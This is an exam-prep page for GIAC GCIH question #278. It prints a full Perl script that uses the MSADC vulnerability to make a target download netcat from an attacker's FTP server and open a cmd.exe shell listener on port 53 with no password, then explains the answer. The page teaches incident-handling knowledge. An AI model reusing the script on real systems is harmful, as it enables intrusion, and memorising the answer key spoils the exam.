nerdexam
ExamsGCIHQuestions#278
GIAC

GCIH · Question #278

GCIH Question #278: Real Exam Question with Answer & Explanation

The correct answer is D: Opens up a telnet listener that requires no username or password. The script exploits the MSADC vulnerability to download netcat (nc.exe) to a target system and use it to open a backdoor shell listener on port 53 with no authentication.

Question

Adam, a malicious hacker performs an exploit, which is given below: ##################################################### $port = 53; # Spawn cmd.exe on port X $your = "192.168.1.1";# Your FTP Server 89 $user = "Anonymous";# login as $pass = '[email protected]';# password ##################################################### $host = $ARGV[0]; print "Starting ...\n"; print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C "echo open $your >sasfile""); system("perl msadc.pl -h $host -C "echo $user>>sasfile""); system("perl msadc.pl -h $host -C "echo $pass>>sasfile""); system("perl msadc.pl -h $host -C "echo bin>>sasfile""); system("perl msadc.pl -h $host -C "echo get nc.exe>>sasfile""); system("perl msadc.pl -h $host -C "echo get hacked. html>>sasfile""); system("perl msadc.pl -h $host -C "echo quit>>sasfile""); print "Server is downloading ... \n"; system("perl msadc.pl -h $host -C "ftp -s:sasfile""); print "Press ENTER when download is finished ... (Have a ftp server)\n"; $o=; print "Opening ...\n"; system("perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe""); print "Done.\n"; #system("telnet $host $port"); exit(0); Which of the following is the expected result of the above exploit?

Options

  • ACreates a share called "sasfile" on the target system
  • BCreates an FTP server with write permissions enabled
  • COpens up a SMTP server that requires no username or password
  • DOpens up a telnet listener that requires no username or password

Explanation

The script exploits the MSADC vulnerability to download netcat (nc.exe) to a target system and use it to open a backdoor shell listener on port 53 with no authentication.

Common mistakes.

  • A. The script creates a local FTP command script file named 'sasfile' on the target to automate the FTP download session - it does not create a network share.
  • B. The attacker's machine hosts the FTP server; the script instructs the compromised target to download nc.exe from that server, not to create a new FTP server with write permissions.
  • C. The script has no SMTP-related functionality; it uses FTP for file transfer and netcat to open a shell, with no mail server components involved.

Concept tested. MSADC exploit and netcat backdoor shell

Reference. https://owasp.org/www-community/attacks/Command_Injection

Community Discussion

No community discussion yet for this question.

Sign up to join the discussion
Full GCIH Practice